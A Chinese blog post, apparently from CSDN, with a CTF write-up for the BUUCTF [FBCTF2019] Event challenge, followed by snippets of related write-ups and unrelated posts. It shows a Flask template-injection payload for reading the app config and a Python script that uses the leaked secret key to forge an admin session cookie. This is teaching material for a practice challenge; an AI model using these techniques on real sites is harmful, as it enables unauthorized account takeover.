BUUCTF--[FBCTF2019]Event

最新推荐文章于 2022-09-30 19:45:15 发布
最新推荐文章于 2022-09-30 19:45:15 发布
阅读量251 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119697884
版权

网络安全 Cookie伪造 模板注入 加密密钥 session篡改
关键词由CSDN通过智能技术生成

进入页面,注册登录

访问flag

 查看Cookie,这里很容易就猜到是要伪造Cookie

 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名.

 看大佬的wp知道
event_important参数存在模版注入,输入__dict__,发现成功回显
接着查找配置文件:__class__.__init__.__globals__[app].config

发现加密所需的密钥,伪造session

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

将所得到的session替换掉user内容,再次访问flag即可得到flag

Uzero.
关注
EDA - 如何设计一个支持【异步/同步】模式的 Event-Driven Architecture 架构
小工匠
07-09 1万+
EDA(Event-Driven Architecture)是一种实现组件之间松耦合、易扩展的架构方式。一个最简单的EDA设计需要包含如下几个组件:Events:需要被处理的数据。Event Handlers:处理Events的方式方法。Event Loop:维护Events和Event Handlers之间的交互流程。举个例子 :Event A将被Handler A处理,而Event B将被Handler B处理,这一切的分配都是由Event Loop所控制的。
BUUCTF [FBCTF2019] Event
Senimo
01-13 465
BUUCTF [FBCTF2019] Event 考点: Flask模版注入 伪造Session登陆 非常规格式SECRET_KEY加密 启动环境: 一个登陆注册页面,若点击Admin panel,提示: 使用Username:test,Password:test登陆后: 并没有限制登陆,可能是成功注册用户test 可以向数据库中添加新的事件,尝试添加: Name:hahaha Address:8.8.8.8 得到回显: 其选项框可以选择显示添加的事件名或事件地址 此时再次点击Admin p
BUUCTF:[FBCTF2019]Event
末初的CSDN博客
07-29 877
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
[FBCTF2019]Event
qq_45691294的博客
09-29 734
打开题目,只有一个登录注册框,无法使用admin登录注册 在 /flag 页面中提示我们并不是管理员,猜测要得到管理员权限才可以Get Flag 在主页看到表单,先随意输入一些值进去,页面回显了Name of your event 的值 这里有可能存在xss或者SSTI,尝试后,无css,应该存在SSTI 抓包发现cookie,event_sesh_cookie应该是jwt加密过 大致猜测出本题应该是可以通过SSTI得到密钥伪造cookie,越权登录admin的账户 在提交数据的时候,有三个可控参数
[FBCTF2019]Event(flask 伪造签名)
paidx0
08-27 307
[FBCTF2019]Event(flask 伪造签名)
vue-event-calendar 事件日历组件
肖肖肖丽珠的博客
12-29 1万+
在线小例子http://geoffzhu.cn/vue-event-calendar/ 支持移动端和web端,因为他可以随着屏幕大小一行摆不下事件就跑到下面啦。 使用方式 安装 npminstallvue-event-calendar--save 入口 Main.js import 'vue-event-calendar/dist/style.css' //1.1....
Event-b 学习总结
qq_38298291的博客
11-06 3944
目录   概念 组成 语法构成 精化和拓展 概念 Event-b 是一种基于传统的谓词演算和定理证明的形式化语言。 Event-b 新的特征是它引入了事件(Event)。事件是event-b的一个重要特征,因此它非常适合用来为周期行为建模。除此之外,Event-b支持逐步精化地建立系统模型。 组成 一个完整的Event-b 模型包括四部分,Context(上下文) , Mach...
Server-Sent Events(以下简称 SSE)及event-source-polyfill使用单向长连接(后台主动向前端推送)
周家大小姐
08-17 1万+
SSE 与 WebSocket 作用相似,都是建立浏览器与服务器之间的通信渠道,然后服务器向浏览器推送信息SSE 是单向通道,只能服务器向浏览器发送,因为流信息本质上就是下载。如果浏览器向服务器发送信息,就变成了另一次 HTTP 请求。如果加自定义参数可以使用三方插件event-source-polyfill。Server-Sent Events 教程 - 阮一峰的网络日志。缺点:不可以比如请求头中加token等。可 以看到token是有加上去的。...
Added non-passive event listener to ascroll- blocking ‘mousewheel‘event Consider marking event handl
qq_42264793的博客
11-20 1万+
[Violation ] Added non-passive event listener to ascroll- blocking 'mousewheel’event Consider marking event handler as ’ passive’to make the page more responsive. See https: com/feature/574554 3795965952 翻译: [冲突]在ascroll中添加了非被动事件侦听器-阻塞“mousewheel”事件考虑将事件处理
buuctf-web-homebrew event loop
weixin_43345082的博客
08-26 419
源码太多就不贴了 四个按钮 一个是看源码 一个是进商店买 一个是重置 一个是返回index 然后url的格式都是这样的 ?action:index;True%23False ?action:view;shop ?action:view;reset ?action:view;index 分析一下流程 首先登陆的时候 http://url_prefix/d5afe1f66147e857/ 会先进入这...
[FBCTF2019]RCEService 1
plant1234的博客
09-30 808
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
FacebookCTF2019 web writeup
river
06-05 3356
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...
BUUCTF [FBCTF2019] Products Manager
Senimo
01-08 1502
BUUCTF [FBCTF2019] Products Manager 考点: 启动环境: 产品管理,其中有三个功能: 查看前5的产品 添加产品 查看产品细节 知道了大致功能,尝试正常的业务逻辑,首先添加产品,其Secret值需包含10位以上的大小写字母和数字: 添加成功,查询产品细节: 分析题目给出的源码: 其中footer.php页面没用,header.php页面只是首页的三个跳转链接,index.php页面也没有可利用内容。 在db.php页面中,查看到如下SQL语句: CREATE
各种浏览器的userAgent收集
weixin_30663471的博客
12-16 1110
window.navigator.userAgent 1) Chrome Win7: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1 2) Firefox Win7: Mozilla/5.0 (Windows NT...
常见User-Agent大全
热门推荐
荒的博客
04-27 6万+
User-Agent:的值 1) Chrome(谷歌) Win7: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1 Win10: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Broker、Proxy、Agent是什么?原来它们都是蟹堡王餐厅里的章鱼哥~
桔子
09-21 5021
先来看看维基百科怎么定义agent? 维基百科 agent in Computing Agent architecture, a blueprint for software agents and control systems Agent-based model, a computational model for simulating the actions and interact...
常见浏览器User-Agent大全
雪峰流云
12-31 5万+
下面是工作中需要用到的常见浏览器User-Agent字符串的收集整理,不断更新中。 Opera Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60 Opera/8.0 (Windows
浏览器的userAgent归纳
Lam's IT Story
08-14 2万+
IE IE6 User-Agent:Mozilla/4.0 (Windows;MSIE 6.0; Windows NT 5.2) IE7 User-Agent:Mozilla/4.0 (compatible;MSIE 7.0; Windows NT 6.0) IE8 User-Agent:Mozilla/4.0 (compatible;MSIE 8.0; Windows NT 6...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值